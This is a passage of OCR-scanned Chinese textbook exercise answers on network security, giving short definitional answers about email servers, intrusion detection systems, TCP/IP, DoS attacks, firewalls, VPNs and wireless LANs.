输 到 服务 器 ; 二 是 从 某 一 个 服务 器 传输 到 另 一 个 服务 器 。SMTP 是 个 请 求 /响应 协议 , 它 监 
听 25 号 端口 ,用 于 接收 用 户 的 邮件 请 求 , 并 与 远 端 邮件 服务 器 建立 SMTP 连接 。 

2. 在 UNIX/Linux 下 邮件 服务 器 有 哪 几 个 模块 ? 

答 : 在 UNIX/Linux 下 邮件 服务 器 通常 被 分 成 三 个 模块 : 邮件 分 发 代理 (Mail Deliver 
Agent, MDA)、 邮 件 传送 代理 (Mail Transfer Agent,MTA) 和 邮件 用 户 代理 (Mail User 
Agent,MUA) 。 

3. 邮件 内 容 的 安全 问题 主要 包含 哪 几 个 方面 ? 

答 : 邮件 内 容 的 安全 问题 主要 包含 邮件 内 容 的 保密 性 真实 性 .邮件 发 送 者 身份 的 真实 
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性 和 拒绝 电子 邮件 病毒 等 方面 。 

4. 垃圾 邮件 通常 包含 哪些 内 容 ? 反 垃 圾 邮件 技术 主要 包括 哪些 ? 

答 : 垃圾 邮件 通常 包含 商业 广告 ,非法 言论 .病毒 . 丽 吓 和 欺骗 性 言论 等 内 容 。 反 垃圾 
邮件 技术 主要 包括 过 滤 技术 、 验 证 查询 技术 挑战 技术 和 密码 技术 等 。 


第 10 章 


1. 什么 是 入 侵 检测 系统 ? 它 的 主要 功能 有 哪些 ? 包含 哪些 组 件 ? 

答 : 人 侵 检测 系统 (Intrusion Detection System,IDS) 是 探测 对 用 户 计算 机 网 络 的 攻击 
行为 的 软件 或 硬件 。 

入 侵 检测 系统 的 主要 功能 有 : 监测 并 分 析 用 户 和 系统 的 活动 ,核查 系统 配置 和 漏洞 , 评 
佑 系统 关键 资源 和 数据 文件 的 完整 性 ,识别 已 知 的 攻击 行为 ,统计 分 析 异 常 行为 ,操作 系统 
日 志 管 理 , 识 别 违反 安全 策略 的 用 户 活动 等 。 

一 个 人 侵 检 测 系统 包含 事件 产生 器 (event generators) ,事件 分 析 器 (event analyzers) 、 
响应 单元 (response units) .事件 数据 库 (event databases) 四 个 组 件 。 

2. 什么 是 人 侵 行为 ? 

答 :“ 入 侵 ”(intrusion) 是 个 广义 的 概念 ,不 仅 包括 发 起 攻击 的 人 (如 恶意 的 黑客 ) 取 得 
超出 合法 范围 的 系统 控制 权 , 也 包括 收集 漏洞 信息 ,造成 拒绝 访问 (Denial of Service, DoS) 
等 对 计算 机 系统 造成 危害 的 行为 。 

3. IDS 监视 的 两 种 主要 类 型 是 什么 ? 

答 : IDS 监视 的 主要 类 型 分 别 是 基于 主机 的 IDS 监视 和 基于 网 络 的 IDS 监视 。 

4. 两 种 IDS 触发 机 制 是 什么 ? 

答 : IDS 触发 的 两 种 机 制 分 别 是 异常 检测 (基于 模型 ) 和 滥用 检测 (基于 特征 ) 。 

5. IDS 的 目的 是 什么 ? 

答 : IDS 用 来 检测 针对 网 络 的 攻击 。 

6. 什么 是 异常 检测 ? 说明 异常 检测 的 主要 优点 和 缺点 。 

答 : 异常 检测 是 指 通过 观测 偏离 正常 用 户 行为 的 操作 ,从 而 检测 警报 。 异 常 检 测 的 主 
要 优点 是 可 以 检测 原先 未 知 的 攻击 类 型 。 异 常 检测 的 缺点 是 : 复杂 度 较 高 ,需要 初始 训练 
时 间 , 在 训练 过 程 中 不 能 保护 网 路 的 安全 。 而 且 异 常 检测 很 难 定义 用 户 的 正常 行为 ,报警 信 
息 有 时 会 很 难 理解 。 

7. 什么 是 滥用 检测 ?滥用 检测 的 缺点 是 什么 ? 

答 : 滥用 检测 是 指 通 过 与 存储 在 数据 库 中 的 已 知 入 侵 活动 的 特征 进行 数据 匹配 ,从 而 
产生 警报 。 滥 用 检测 的 缺点 是 无 法 检测 未 知 的 攻击 行为 ,而 且 经 常 需要 用 新 的 攻击 来 更 新 
特征 数据 库 。 

8. 基于 主机 的 IDS 监视 的 主要 缺点 是 什么 ? 

答 : 基于 主机 的 IDS 监视 的 主要 缺点 就 是 需要 支持 多 种 操作 系统 。 

9. 基于 网 络 的 IDS 的 两 个 主要 限制 是 什么 ? 

答 : 基于 网 络 的 IDS 的 两 个 主要 限制 是 带宽 和 加 密 。 

10. 什么 是 混合 型 IDS? 

答 : 混合 型 IDS 把 多 种 IDS 技术 组 合 到 一 个 IDS 中 ,从 而 提供 更 强 的 功能 。 


附录 B 习题 答 


11. 基于 特征 的 IDS 有 哪些 优点 ? 

答 : 基于 特征 的 IDS 有 一 个 特征 数据 库 ,该 数据 库 是 建立 在 实际 攻击 数据 的 基础 之 上 
的 ,被 探测 到 的 攻击 都 会 被 清楚 地 定义 ,这 使 得 IDS 系统 容易 被 用 户 理解 ,基于 特征 的 IDS 
在 安装 后 立刻 就 能 检测 攻击 行为 。 

12. 虚假 警报 与 漏 报 的 区 别 是 什么 ? 

答 : 虚假 警报 是 由 于 正常 的 用 户 数据 流 而 产生 的 警报 ,而 漏 报 是 指 对 于 一 个 已 知 的 攻 
击 ,IDS 不 能 够 产生 警报 。 


第 11 章 


1. TCP/IP 的 全 称 是 什么 ? 

答 : TCP/IP 的 全 称 是 Transmission Control Protocol/internet Protocol, 即 传输 控制 
协议 和 互联 网 协议 。 

2. 7 层 协议 包含 哪 7 层 ? 4 层 模型 包含 哪 4 层 ? 

答 : 7 层 协 议 包 含 物理 层 .数据 链 路 层 、 网 络 层 ,运输 层 、 会 话 层 、 表 示 层 和 应 用 层 。4 层 
模型 包括 应 用 层 、 运 输 层 、 网 络 层 和 网 络 访问 层 。 

3. 什么 是 UDP 协议 ? 

答 : UDP 协议 是 用 户 数 据 报 协议 (User Datagram Protocol) ,是 一 个 不 可 靠 的 无 链接 数 
据 报 协议 

4. 路 由 器 主要 有 哪 几 项 功能 ? 

答 : 路 由 器 的 主要 功能 包括 : 连接 不 同 的 网 络 .协议 转换 和 路 由 选择 功能 、 网 络 管理 和 
安全 三 项 。 

5. 什么 是 拒绝 服务 (DoS) 攻 击 ? 对 服务 器 实施 拒绝 服务 攻击 ,实质 上 的 方式 有 哪 
两 种 ? 

答 : 拒绝 服务 攻击 是 通过 拒绝 对 特定 网 络 资源 的 访问 ,来 中 断 一 个 特定 系统 或 网 络 的 
正常 运行 。 

对 Server 实施 拒绝 服务 攻击 ,实质 上 的 方式 有 迫使 服务 器 的 缓冲 区 满 , 不 接收 新 的 请 
求 ; 使 用 IP 欺骗 ,迫使 服务 器 把 合法 用 户 的 连接 复位 。 

6. 什么 是 DDoS 攻击 ? 什么 是 DRDoS 攻击 ? 

答 : DDoS(Distributed Denial of Service) 攻 击 , 是 指 分 布 式 拒绝 服务 攻击 。 即 黑客 控制 
一 些 数量 的 PC 或 路 由 器 ,用 这 些 PC 或 路 由 器 发 动 DoS 攻击 ,使 遭受 攻击 的 网 络 服务 器 处 
理 能 力 全 部 被 占用 。 

DRDoS(Distributed Reflection Denial of Service) 即 分 布 式 反 射 拒绝 服务 , 它 对 DDoS 
做 了 改进 , 它 是 通过 对 正常 的 服务 器 进行 网 络 连接 请 求 来 达到 攻击 目的 的 。 


第 12 章 


1. 什么 是 防火 墙 ? 防火 墙 按照 对 内 外 来 往 数 据 的 处 理 方法 可 以 分 为 哪 两 类 ? 

答 : 防火 墙 是 一 个 安全 组 件 , 它 根据 预先 定义 的 安全 策略 ,对 进入 被 保护 网 络 的 数据 流 
进行 限制 。 按 照 防 火 墙 对 内 外 来 往 数据 的 处 理 方法 ,大 致 可 以 将 防火 墙 分 为 两 大 体系 : 包 
过 滤 防 火 墙 和 代理 防火 墙 (应 用 层 网 关 防 火 墙 ) 。 
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2. 包 过 滤 防 火 墙 包括 哪 两 种 过 滤 方 式 ? 

答 : 包 过 滤 防 火 墙 包 括 : 静态 包 过 滤 和 动态 包 过 滤 两 种 方式 。 

3. 防火 墙 按照 网 络 体系 结构 可 以 分 为 哪 几 类 ? 

答 : 防火 墙 按照 网 络 体 系 结构 可 以 分 为 : 网 络 级 防火 墙 .应 用 级 网 关 防 火 墙 \ 电 路 级 网 
关 防 火 墙 和 规则 检查 防火 墙 等 。 

4. 分 布 式 防火 墙 主要 包括 哪 几 部 分 ? 

答 : 分 布 式 防火 墙 主要 包括 网 络 防火 墙 Cnetwork firewall) 、 主 机 防火 墙 (host firewall) 
和 中 心 管 理 (central management) 软 件 等 部 分 。 

5. 防水 墙 系统 由 哪 几 部 分 组 成 ? 

答 : 完整 的 防水 墙 系统 由 防水 墙 服 务 器 (WaterBox Server) ,防水 墙 控 制 台 (WaterBox 
Console) 和 防水 墙 客户 端 (WaterBox Watcher) 三 部 分 组 成 。 


第 13 章 


1. VPN 的 全 称 是 什么 ? 它 的 简要 定义 是 什么 ? 

答 : VPN 的 全 称 是 Virtual Private Network, 即 虚拟 专用 网 络 。 

VPN 的 简要 定义 是 : VPN 是 “虚拟 的 ”, 因 为 它 不 是 一 个 物理 的 .明显 存在 的 网 络 。 两 
个 不 同 的 物理 网 络 之 间 的 连接 由 通道 来 建立 。VPN 是 “专用 的 ”, 因 为 为 了 提供 机 密 性 , 通 
道 被 加 密 。VPN 是 “网 络 ”, 因 为 它 是 联网 的 ! 连接 两 个 不 同 的 网 络 , 并 有 效 地 建立 一 个 独 
立 的 .虚拟 的 实体 一 一 一 个 新 的 网 络 。 

2. VPN 提供 了 哪 两 种 基本 安全 概念 ? 

答 : VPN 可 以 提供 私密 性 和 完整 性 。 

3. VPN 隧道 技术 主要 有 哪 几 种 ? 

答 : VPN 隧道 技术 主要 有 : 点 对 点 隧道 协议 (PPTP) .第 2 层 隧道 协议 (L2TP) 和 安全 
IP(IPSec) 隧 道 模式 等 。 

4. PPP 提供 的 验证 方式 有 哪 几 种 ? 

答 : PPP 提供 的 验证 方式 主要 有 : 口令 验证 协议 (PAP) ,挑战 -握手 验证 协议 (CHAP) 
和 Microsoft 挑战 -握手 验证 协议 (MS-CHAP)。 

5. IPSec 隧道 的 类 型 有 哪 两 种 ? 

答 : IPSec 隧道 的 类 型 有 : 自愿 隧道 (Voluntary Tunnel) 和 强制 隧道 (Compulsory 
Tunnel) 两 种 。 

6. 实现 VPN 的 安全 技术 有 哪些 ? 

答 : 实现 VPN 的 安全 技术 主要 有 : 认证 .加 密 、 密 钥 交 换 与 管理 。 

7. VPN 在 企业 中 有 哪 三 种 组 网 方式 ? 

答 : VPN 在 企业 中 有 Access VPN( 远 程 访问 VPN) ,客户 端 到 网 关 、Intranet VPN( 企 
业内 联 VPN) ,网 关 到 网 关 、Extranet VPN( 企 业 外 联 VPN) ,与 合作 伙伴 企业 网 构成 外 联网 
(Extranet) 三 种 组 网 方式 。 

8. 什么 是 MPLS VPN? 

答 : MPLS VPN 是 指 一 种 基于 MPLS 技术 的 IP VPN, 是 在 网 络 路 由 和 交换 设备 上 应 
用 MPLS(MultiProtocol Label Switching, 多 协议 标记 交换 ) 技 术 , 简 化 核心 路 由 器 的 路 由 
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选择 方式 ,利用 结合 传统 路 由 技术 的 标记 交换 实现 的 IP 虚拟 专用 网 络 (IP VPN) ,构造 宽带 
的 Intranet\Extranet ,满足 用 户 多 种 业务 的 需求 。 


第 14 章 


1. Wi-Fi 的 全 称 是 什么 ? MIMO 的 全 称 是 什么 ? 

答 : Wi-Fi 的 全 称 是 WireLess-Fidelity ,代表 Ethernet for WLAN, 专 指 IEEE 802. 11b 
无 线 标准 。 

MIMO 的 全 称 是 Multiple Input Multiple Output。 其 原理 是 捆绑 了 两 条 802. 11g 信 
道 ,通过 两 根 或 多 根 天 线 同 时 收发 ,提高 信号 的 强度 和 质量 ,所 以 可 以 达到 双 倍 或 多 倍 的 速 
度 ,传输 速度 理论 上 高 于 100Mb/s。 

2. 什么 是 热点 ? 

答 : 热点 (hot spot) 是 指 位 于 公共 区 域 的 无 线 接 入 点 ,用 户 可 以 通过 这 个 接 入 点 以 无 线 
方式 接 入 Internet, 通 常 热点 可 以 提供 接近 宽带 的 访问 速率 。 

3. 无 线 局 域 网 络 的 优点 有 哪些 ? 影响 无 线 局 域 网 性 能 的 因素 有 了 哪些? 

答 : 无 线 局 域 网 络 的 优点 包括 : 移动 性 、 灵 活性 、 扩 展 性 、 广 泛 性 和 低 投入 等 优点 。 

影响 无 线 局 域 网 性 能 的 因素 包括 : 无 线 网 卡 的 传输 速率 、 天 线 的 类 型 和 方向 、 外 界 的 噪 
声 和 干扰 、 建 筑 物 结构 和 热点 的 位 置 等 方面 。 

4. Super G 技术 采用 了 哪些 关键 技术 ? 

答 : Super G 技术 主要 采用 了 频道 绑 定 (channel bonding) 技 术 ,快速 帧 (fast frames) 技 
术 、 包 突 发 机 制 (frame bursting) 技术 、 硬 件 压 缩 机 制 (compression ) 技术 和 动态 切换 
(dynamic turbo) 技 术 等 。 

5. 根据 网 络 解决 方案 进行 划分 ,无 线 网 络 可 以 分 为 哪 几 类 ? 根据 连接 方式 进行 划分 ， 
无 线 网 络 可 以 分 为 哪 几 类 ? 

答 : 根据 网 络 解决 方案 进行 划分 ,无 线 网 络 可 以 分 为 无 线 个 人 网 (WPAN) ,无线 局 域 网 
(WLAN) .无 线 LAN-to-LAN 网 桥 、 无 线 城 域 网 WMAN) 和 无 线 广域网 WWAN) 等 。 根 
据 连 接 方式 进行 划分 ,无线 网 络 可 以 分 为 点 对 点 模式 和 Infrastructure 模式 。 

6. 无 线 局 域 网 受到 的 安全 威胁 来 自 哪 几 方面 ? 

答 : 无 线 局 域 网 受到 的 安全 威胁 主要 来 自 未 经 授权 使 用 网 络 服 务 、 地 址 欺骗 和 会 话 拦 
截 等 方面 。 
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